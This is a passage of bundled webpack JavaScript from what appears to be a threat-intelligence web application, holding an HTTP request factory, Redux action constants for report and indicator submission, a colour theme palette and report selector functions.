/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "k", function() { return __WEBPACK_IMPORTED_MODULE_6__split__["b"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7__splits__ = __webpack_require__(1275);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "l", function() { return __WEBPACK_IMPORTED_MODULE_7__splits__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8__trafficType__ = __webpack_require__(2760);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "m", function() { return __WEBPACK_IMPORTED_MODULE_8__trafficType__["a"]; });
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "n", function() { return __WEBPACK_IMPORTED_MODULE_8__trafficType__["b"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9__isOperational__ = __webpack_require__(2761);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "g", function() { return __WEBPACK_IMPORTED_MODULE_9__isOperational__["a"]; });
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "h", function() { return __WEBPACK_IMPORTED_MODULE_9__isOperational__["b"]; });
// This file is just here for easier consumption of the validators.











/***/ }),
/* 203 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return noCacheExtraHeader; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_object_assign__ = __webpack_require__(22);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_object_assign___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_object_assign__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__options__ = __webpack_require__(2845);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/



function RequestFactory(settings, relativeUrl, params, extraHeaders) {
  var token = settings.core.authorizationKey;
  var version = settings.version;
  var _settings$runtime = settings.runtime,
      ip = _settings$runtime.ip,
      hostname = _settings$runtime.hostname;
  var headers = {};
  var baseline = Object(__WEBPACK_IMPORTED_MODULE_1__options__["a" /* default */])();
  headers['Accept'] = 'application/json';
  headers['Content-Type'] = 'application/json';
  headers['Authorization'] = "Bearer " + token;
  headers['SplitSDKVersion'] = version;
  if (ip) headers['SplitSDKMachineIP'] = ip;
  if (hostname) headers['SplitSDKMachineName'] = hostname;
  if (extraHeaders) __WEBPACK_IMPORTED_MODULE_0_object_assign___default()(headers, extraHeaders);
  return __WEBPACK_IMPORTED_MODULE_0_object_assign___default()({
    headers: headers,
    url: settings.url(relativeUrl)
  }, baseline, params);
}

/* harmony default export */ __webpack_exports__["a"] = (RequestFactory);
var noCacheExtraHeader = {
  'Cache-Control': 'no-cache'
};

/***/ }),
/* 204 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "INITIALIZE", function() { return INITIALIZE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SET_STAGE", function() { return SET_STAGE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SET_SUBMISSION_TYPE", function() { return SET_SUBMISSION_TYPE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "TOGGLE_REDACTION", function() { return TOGGLE_REDACTION; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "REVIEW_REPORT", function() { return REVIEW_REPORT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "REVIEW_REPORT_SUCCESS", function() { return REVIEW_REPORT_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "REVIEW_REPORT_FAILURE", function() { return REVIEW_REPORT_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SUBMIT_REPORT", function() { return SUBMIT_REPORT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SUBMIT_REPORT_SUCCESS", function() { return SUBMIT_REPORT_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SUBMIT_REPORT_FAILURE", function() { return SUBMIT_REPORT_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "POLL_FOR_REPORT", function() { return POLL_FOR_REPORT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "REPORT_POLLING_FAILURE", function() { return REPORT_POLLING_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "REPORT_PROCESSED", function() { return REPORT_PROCESSED; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SUBMIT_INDICATORS", function() { return SUBMIT_INDICATORS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SUBMIT_INDICATORS_SUCCESS", function() { return SUBMIT_INDICATORS_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SUBMIT_INDICATORS_FAILURE", function() { return SUBMIT_INDICATORS_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SUBMIT_INDICATORS_FILE", function() { return SUBMIT_INDICATORS_FILE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "UPDATE_REPORT", function() { return UPDATE_REPORT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "UPDATE_REPORT_SUCCESS", function() { return UPDATE_REPORT_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "UPDATE_REPORT_FAILURE", function() { return UPDATE_REPORT_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "ATTACH_FILE", function() { return ATTACH_FILE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "UPLOAD_FILE", function() { return UPLOAD_FILE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "ATTACH_FILE_FAILURE", function() { return ATTACH_FILE_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "UPLOAD_FILE_SUCCESS", function() { return UPLOAD_FILE_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "UPLOAD_FILE_FAILURE", function() { return UPLOAD_FILE_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "ATTACH_INDICATORS_SPREADSHEET_FILE", function() { return ATTACH_INDICATORS_SPREADSHEET_FILE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "ATTACH_INDICATORS_SPREADSHEET_FILE_FAILURE", function() { return ATTACH_INDICATORS_SPREADSHEET_FILE_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "ATTACH_INDICATORS_SPREADSHEET_FILE_SUCCESS", function() { return ATTACH_INDICATORS_SPREADSHEET_FILE_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "LOAD_REPORT_DATA", function() { return LOAD_REPORT_DATA; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "LOAD_EXISTING_REPORT_CONTENT", function() { return LOAD_EXISTING_REPORT_CONTENT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "REGISTER_FORM", function() { return REGISTER_FORM; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SET_FIELD_VALUE", function() { return SET_FIELD_VALUE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SET_FORM_VALUES", function() { return SET_FORM_VALUES; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "UNREGISTER_FORM", function() { return UNREGISTER_FORM; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "RESET_FORM", function() { return RESET_FORM; });
var prefix = function prefix(str) {
  return 'station/create/' + str;
};

var INITIALIZE = prefix('INITIALIZE');
var SET_STAGE = prefix('SET_STAGE');
var SET_SUBMISSION_TYPE = prefix('SET_SUBMISSION_TYPE');
var TOGGLE_REDACTION = prefix('TOGGLE_REDACTION');

var REVIEW_REPORT = prefix('REVIEW_REPORT');
var REVIEW_REPORT_SUCCESS = prefix('REVIEW_REPORT_SUCCESS');
var REVIEW_REPORT_FAILURE = prefix('REVIEW_REPORT_FAILURE');

var SUBMIT_REPORT = prefix('SUBMIT_REPORT');
var SUBMIT_REPORT_SUCCESS = prefix('SUBMIT_REPORT_SUCCESS');
var SUBMIT_REPORT_FAILURE = prefix('SUBMIT_REPORT_FAILURE');

var POLL_FOR_REPORT = prefix('POLL_FOR_REPORT');
var REPORT_POLLING_FAILURE = prefix('REPORT_POLLING_FAILURE');
var REPORT_PROCESSED = prefix('REPORT_PROCESSED');

var SUBMIT_INDICATORS = prefix('SUBMIT_INDICATORS');
var SUBMIT_INDICATORS_SUCCESS = prefix('SUBMIT_INDICATORS_SUCCESS');
var SUBMIT_INDICATORS_FAILURE = prefix('SUBMIT_INDICATORS_FAILURE');

var SUBMIT_INDICATORS_FILE = prefix('SUBMIT_INDICATORS_FILE');

var UPDATE_REPORT = prefix('UPDATE_REPORT');
var UPDATE_REPORT_SUCCESS = prefix('UPDATE_REPORT_SUCCESS');
var UPDATE_REPORT_FAILURE = prefix('UPDATE_REPORT_FAILURE');

var ATTACH_FILE = prefix('ATTACH_FILE');
var UPLOAD_FILE = prefix('UPLOAD_FILE');
var ATTACH_FILE_FAILURE = prefix('ATTACH_FILE_FAILURE');
var UPLOAD_FILE_SUCCESS = prefix('UPLOAD_FILE_SUCCESS');
var UPLOAD_FILE_FAILURE = prefix('UPLOAD_FILE_FAILURE');

var ATTACH_INDICATORS_SPREADSHEET_FILE = prefix('ATTACH_INDICATORS_SPREADSHEET_FILE');
var ATTACH_INDICATORS_SPREADSHEET_FILE_FAILURE = prefix('ATTACH_INDICATORS_SPREADSHEET_FILE_FAILURE');
var ATTACH_INDICATORS_SPREADSHEET_FILE_SUCCESS = prefix('ATTACH_INDICATORS_SPREADSHEET_FILE_SUCCESS');

var LOAD_REPORT_DATA = prefix('LOAD_REPORT_DATA');
var LOAD_EXISTING_REPORT_CONTENT = prefix('LOAD_EXISTING_REPORT_CONTENT');

var REGISTER_FORM = prefix('REGISTER_FORM');
var SET_FIELD_VALUE = prefix('SET_FIELD_VALUE');
var SET_FORM_VALUES = prefix('SET_FORM_VALUES');
var UNREGISTER_FORM = prefix('UNREGISTER_FORM');
var RESET_FORM = prefix('RESET_FORM');

/***/ }),
/* 205 */,
/* 206 */,
/* 207 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "FJORD", function() { return FJORD; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "MARINER", function() { return MARINER; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SAFFRON", function() { return SAFFRON; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "MANATEE", function() { return MANATEE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "PORCELIN", function() { return PORCELIN; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "ALABASTER", function() { return ALABASTER; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "ST_TROPAZ", function() { return ST_TROPAZ; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "MOUNTAIN_MEADOW", function() { return MOUNTAIN_MEADOW; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "GREEN_LEAF", function() { return GREEN_LEAF; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "ATHENS_GRAY", function() { return ATHENS_GRAY; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "HAVELOCK_BLUE", function() { return HAVELOCK_BLUE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "MONZA", function() { return MONZA; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "BUTTERCUP", function() { return BUTTERCUP; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "CHRISTI", function() { return CHRISTI; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "BLACK", function() { return BLACK; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "WHITE", function() { return WHITE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "ATOMIC_TANGERINE", function() { return ATOMIC_TANGERINE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "CELLO", function() { return CELLO; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "PRUSSIAN_BLUE", function() { return PRUSSIAN_BLUE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "CLOUD_BURST", function() { return CLOUD_BURST; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "THUNDER", function() { return THUNDER; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "TUNDORA", function() { return TUNDORA; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "MINE_SHAFT", function() { return MINE_SHAFT; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_trustar_2_0_types__ = __webpack_require__(97);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__util__ = __webpack_require__(378);



var colorManifest = this;

var FJORD = { name: 'fjord', hex: '#44546a', X900: '#222d3c', X800: '#354254', X700: '#44546a', X600: '#546781', X500: '#627692', X400: '#7989a3', X300: '#8f9eb5', X200: '#aebacd', X100: '#cbd6e5', X50: '#e9eefa', buttonText: '#ffffff' };
var MARINER = { name: 'mariner', hex: '#3568d5', X900: '#3148b5', X800: '#3568d5', X700: '#377ae8', X600: '#388dfc', X500: '#389bff', X400: '#4caaff', X300: '#6bbaff', X200: '#95ceff', X100: '#bee0ff', X50: '#e4f3ff', buttonText: '#ffffff' };
var SAFFRON = { name: 'saffron', hex: '#eebd31', X900: '#e77f17', X800: '#eca628', X700: '#eebd31', X600: '#f0d43a', X500: '#efe43e', X400: '#f2e95b', X300: '#f5ee78', X200: '#f7f39e', X100: '#faf8c5', X50: '#fdfce7', buttonText: '#000000' };
var MANATEE = { name: 'manatee', hex: '#979ba6', X900: '#a2a6af', X800: '#adb0b9', X700: '#b8bbc2', X600: '#c3c5cc', X500: '#ced0d5', X400: '#d9dade', X300: '#e4e5e8', X200: '#eff0f1', X100: '#fafafb', X50: '#fff', buttonText: '#ffffff' };
var PORCELIN = { name: 'porcelin', hex: '#e8ebed', X900: '#f3f5f6', X800: '#fff', X700: '#fff', X600: '#fff', X500: '#fff', X400: '#fff', X300: '#fff', X200: '#fff', X100: '#fff', X50: '#fff', buttonText: '#ffffff' };
var ALABASTER = { name: 'alabaster', hex: '#f7f7f7', X900: '#fff', X800: '#fff', X700: '#fff', X600: '#fff', X500: '#fff', X400: '#fff', X300: '#fff', X200: '#fff', X100: '#fff', X50: '#fff', buttonText: '#ffffff' };
var ST_TROPAZ = { name: 'st_tropaz', hex: '#265192', X900: '#2a5aa2', X800: '#2e63b2', X700: '#336cc3', X600: '#3d76cd', X500: '#4d82d1', X400: '#5d8dd5', X300: '#6e98d9', X200: '#7ea4dd', X100: '#8eafe2', X50: '#9ebbe6', buttonText: '#ffffff' };
var MOUNTAIN_MEADOW = { name: 'mountain_meadow', hex: '#11d689', X900: '#006b1e', X800: '#008c33', X700: '#009d3f', X600: '#00b04c', X500: '#00c056', X400: '#00cc6e', X300: '#11d689', X200: '#7ae2ac', X100: '#b3edcc', X50: '#e0f8eb', buttonText: '#ffffff' };
var GREEN_LEAF = { name: 'green_leaf', hex: '#417505', X900: '#4c8906', X800: '#579c07', X700: '#62b008', X600: '#6cc308', X500: '#77d709', X400: '#82ea0a', X300: '#8cf514', X200: '#96f627', X100: '#a0f73b', X50: '#a9f74f', buttonText: '#ffffff' };
var ATHENS_GRAY = { name: 'athens_gray', hex: '#eaecf1', X900: '#bbbdc1', X800: '#d3d4d9', X700: '#eaecf1', X600: '#eceef2', X500: '#eef0f4', X400: '#f0f2f5', X300: '#f2f4f7', X200: '#f5f6f8', X100: '#f7f7f9', X50: '#f9f9fb', buttonText: '#000000' };
var HAVELOCK_BLUE = { name: 'havelock_blue', hex: '#4a90e2', X900: '#5c9be5', X800: '#6da6e8', X700: '#7fb0ea', X600: '#90bbed', X500: '#a2c6f0', X400: '#b3d1f3', X300: '#c5dbf6', X200: '#d7e6f9', X100: '#e8f1fb', X50: '#fafcfe', buttonText: '#ffffff' };
var MONZA = { name: 'monza', hex: '#d0021b', X900: '#e4021e', X800: '#f80220', X700: '#fd122f', X600: '#fd2741', X500: '#fd3b52', X400: '#fd4f64', X300: '#fe6376', X200: '#fe7888', X100: '#fe8c9a', X50: '#fea0ab', buttonText: '#ffffff' };
var BUTTERCUP = { name: 'buttercup', hex: '#f5a623', X900: '#f6ae37', X800: '#f7b64a', X700: '#f8be5e', X600: '#f9c671', X500: '#f9cd85', X400: '#fad598', X300: '#fbddac', X200: '#fce5bf', X100: '#fdedd3', X50: '#fef5e6', buttonText: '#000000' };
var CHRISTI = { name: 'christi', hex: '#68af15', X900: '#73c117', X800: '#7ed319', X700: '#88e41d', X600: '#92e630', X500: '#9be842', X400: '#a5ea54', X300: '#afed66', X200: '#b8ef78', X100: '#c2f18b', X50: '#cbf39d', buttonText: '#ffffff' };
var BLACK = { name: 'black', hex: '#000000', X900: '#000000', X800: '#262626', X700: '#434343', X600: '#555555', X500: '#7b7b7b', X400: '#9d9d9d', X300: '#c4c4c4', X200: '#d9d9d9', X100: '#e9e9e9', X50: '#f5f5f5', buttonText: '#ffffff' };
var WHITE = { name: 'white', hex: '#ffffff', X900: '#ffffff', X800: '#ffffff', X700: '#ffffff', X600: '#ffffff', X500: '#ffffff', X400: '#ffffff', X300: '#ffffff', X200: '#ffffff', X100: '#ffffff', X50: '#ffffff', buttonText: '#000000' };
var ATOMIC_TANGERINE = { name: 'atomic_tangerine', hex: '#ff9a6f', X900: '#ff763c', X800: '#ffac89', X700: '#ffbea2', X600: '#ffd0bc', X500: '#ffd0bc', X400: '#ffd0bc', X300: '#ffd0bc', X200: '#ffd0bc', X100: '#ffd0bc', X50: '#ffd0bc', buttonText: '#000000' };

// Temporary Dark Theme Stub
var CELLO = { name: 'cello', hex: '#234663', buttonText: '#000000' };
var PRUSSIAN_BLUE = { name: 'prussian_blue', hex: '#002a4d', buttonText: '#000000' };
var CLOUD_BURST = { name: 'cloud_burst', hex: '#223450', X900: '#1b2a40', X800: '#1f2f48', X700: '#223450', X600: '#384862', X500: '#4e5d73', X400: '#647185', X300: '#7a8596', X200: '#919aa8', X100: '#a7aeb9', X50: '#bdc2cb', buttonText: '#000000' };

// Temporary Obsidian Theme Stub
var THUNDER = { name: 'thunder', hex: '#221F20', X900: '#232323', X800: '#282828', X700: '#221F20', X600: '#414141', X500: '#565656', X400: '#6b6b6b', X300: '#808080', X200: '#969696', X100: '#ababab', X50: '#c0c0c0', buttonText: '#ffffff' };
var TUNDORA = { name: 'tundora', hex: '#464646', X900: '#383838', X800: '#3f3f3f', X700: '#464646', X600: '#595959', X500: '#6b6b6b', X400: '#7e7e7e', X300: '#909090', X200: '#a3a3a3', X100: '#b5b5b5', X50: '#c8c8c8', buttonText: '#ffffff' };
var MINE_SHAFT = { name: 'mine-shaft', hex: '#2C2C2C', X900: '#232323', X800: '#282828', X700: '#2c2c2c', X600: '#414141', X500: '#565656', X400: '#6b6b6b', X300: '#909090', X200: '#808080', X100: '#969696', X50: '#ababab', buttonText: '#ffffff' };

for (var color in colorManifest) {
  // $flowIgnore
  colorManifest[color].hover = __WEBPACK_IMPORTED_MODULE_1__util__["c" /* getHoverShade */];
}

/***/ }),
/* 208 */,
/* 209 */,
/* 210 */,
/* 211 */,
/* 212 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__fonts__ = __webpack_require__(3491);
/* harmony namespace reexport (by provided) */ __webpack_require__.d(__webpack_exports__, "FontSizes", function() { return __WEBPACK_IMPORTED_MODULE_0__fonts__["b"]; });
/* harmony namespace reexport (by provided) */ __webpack_require__.d(__webpack_exports__, "FontWeights", function() { return __WEBPACK_IMPORTED_MODULE_0__fonts__["c"]; });
/* harmony namespace reexport (by provided) */ __webpack_require__.d(__webpack_exports__, "LineHeights", function() { return __WEBPACK_IMPORTED_MODULE_0__fonts__["d"]; });
/* harmony namespace reexport (by provided) */ __webpack_require__.d(__webpack_exports__, "FontFamilies", function() { return __WEBPACK_IMPORTED_MODULE_0__fonts__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__layouts__ = __webpack_require__(3492);
/* harmony namespace reexport (by provided) */ __webpack_require__.d(__webpack_exports__, "Widths", function() { return __WEBPACK_IMPORTED_MODULE_1__layouts__["b"]; });
/* harmony namespace reexport (by provided) */ __webpack_require__.d(__webpack_exports__, "Heights", function() { return __WEBPACK_IMPORTED_MODULE_1__layouts__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__util__ = __webpack_require__(378);
/* harmony namespace reexport (by provided) */ __webpack_require__.d(__webpack_exports__, "getButtonColorDefaultTheme", function() { return __WEBPACK_IMPORTED_MODULE_2__util__["a"]; });
/* harmony namespace reexport (by provided) */ __webpack_require__.d(__webpack_exports__, "getButtonColorWithTheme", function() { return __WEBPACK_IMPORTED_MODULE_2__util__["b"]; });
/* harmony namespace reexport (by provided) */ __webpack_require__.d(__webpack_exports__, "getHoverShade", function() { return __WEBPACK_IMPORTED_MODULE_2__util__["c"]; });
/* harmony namespace reexport (by provided) */ __webpack_require__.d(__webpack_exports__, "makeBaseHex", function() { return __WEBPACK_IMPORTED_MODULE_2__util__["e"]; });
/* harmony namespace reexport (by provided) */ __webpack_require__.d(__webpack_exports__, "inDarkMode", function() { return __WEBPACK_IMPORTED_MODULE_2__util__["d"]; });




/***/ }),
/* 213 */,
/* 214 */,
/* 215 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "reports", function() { return reports; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "reportList", function() { return reportList; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "isFetchingList", function() { return isFetchingList; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "displayOptions", function() { return displayOptions; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "metadataCache", function() { return metadataCache; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "currentReportId", function() { return currentReportId; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "currentReportMetadata", function() { return currentReportMetadata; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "reportEnclaves", function() { return reportEnclaves; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "report", function() { return report; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "reportSeq", function() { return reportSeq; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "currentReportOrListItem", function() { return currentReportOrListItem; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "reportOrListItem", function() { return reportOrListItem; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "firstReportResultId", function() { return firstReportResultId; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "firstSearchListResultId", function() { return firstSearchListResultId; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "paginateConstellationId", function() { return paginateConstellationId; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "reportActionAsyncInProgress", function() { return reportActionAsyncInProgress; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_reselect__ = __webpack_require__(34);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_reselect___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_reselect__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_modules_enclave_getters__ = __webpack_require__(217);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_modules_app_getters__ = __webpack_require__(182);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_modules_indicators_getters__ = __webpack_require__(300);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_modules_app_constants__ = __webpack_require__(172);





var debug = __WEBPACK_IMPORTED_MODULE_3_debug___default()('app:modules:reports:getters'); // eslint-disable-line no-unused-vars







var entitiesSearchData = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['search', 'searchResults', 'entities']);
var reportsSearchData = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['search', 'searchResults', 'reports']);

var _reports = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['reports', 'reports']);
var reports = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])([_reports, __WEBPACK_IMPORTED_MODULE_4_modules_enclave_getters__["enclavesMap"]], function (reports, enclaves) {
  return reports.map(function (report) {
    var canonicalEnclaves = report.getIn(['data', 'enclaves'], Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["List"])()).map(function (x) {
      return x.get('id');
    }).map(function (id) {
      return enclaves.get(id);
    });
    return report.setIn(['data', 'enclaves'], canonicalEnclaves);
  });
});
var reportList = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['reports', 'reportList']);
var isFetchingList = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['reports', 'isFetchingList']);
var displayOptions = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['reports', 'options']);
var metadataCache = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['reports', 'metadataCache']);
var currentReportId = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['reports', 'currentReportId']);

var currentReportMetadata = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])([metadataCache, currentReportId], function (metadata, id) {
  // Report ID can be an array if it is clicked on the graph
  var reportId = id && Array.isArray(id) ? id[0] : id;
  return metadata.get(reportId, Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])());
});

var isEnclaveReport = function isEnclaveReport(x) {
  return Boolean(x.getIn(['data', 'enclaves']));
};

// NOTE: It's very important that we sort the enclave IDs. The order isn't
// important other than the fact that they _are ordered_. This is because once
// these enclaves get to the view layer it can causes uneeded rerenders every
// time the order changes, and this can actually happen quite a lot as data is
// fetched from the server. Namely, changing the order of the enclaves casues
// the DetailPanel to rerender because it sees that one of its lists has
// changed.
var toEnclaveIds = function toEnclaveIds(x) {
  return x.getIn(['data', 'enclaves'], Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["List"])()).map(function (x) {
    return x.get('id');
  }).sort();
}; // See NOTE

// OrderedMap of report ids to their enclave list. Reports that are not enclave
// reports are omited, which can be used to determine if a report has enclaves
// at all. If not, it won't even be in this collection
var reportEnclaves = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])([reports, reportList, __WEBPACK_IMPORTED_MODULE_4_modules_enclave_getters__["enclavesMap"]], function (reports, reportList, enclaves) {
  return reports.filter(isEnclaveReport).map(toEnclaveIds).merge(reportList.filter(isEnclaveReport).map(toEnclaveIds)).sort().map(function (x) {
    return x.map(function (id) {
      return enclaves.get(id);
    });
  });
});

var report = function report(id) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(reports, function (reports) {
    return reports.get(id);
  });
};

/**
 * "Merge" in the report pointer (a) with the full report (b). This is why we
 * simply do a setIn on b
 */
var reportMerger = function reportMerger(a, b) {
  // $FlowIgnore: Issue with immutable types
  return b.setIn(['data', 'type'], a.getIn(['data', 'type']));
};

var reportSeq = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])([reportList, reports, reportEnclaves, metadataCache], function (reportList, reports, enclavesByReport, metadata) {
  var mergableReports = reports.filter(function (x) {
    return reportList.has(x.get('id'));
  });
  return reportList.mergeWith(reportMerger, mergableReports) // Merge in any report data that has been fully fetched
  .map(function (x) {
    // $FlowIgnore
    var _data = x.get('data', Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])());
    // $FlowIgnore
    var data = _data.set('loading', x.get('loading'));
    var meta = metadata.get(data.get('id'), Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])()); // NOTE: without the default Map this could return null
    return data.update(function (x) {
      return meta.merge(data);
    }) // Merge metadata with data, but give data precedence
    .set('enclaves', enclavesByReport.get(data.get('id')));
  }).valueSeq();
});

/**
 * NOTE: We check whether the report stored both exists and has an ID. This is
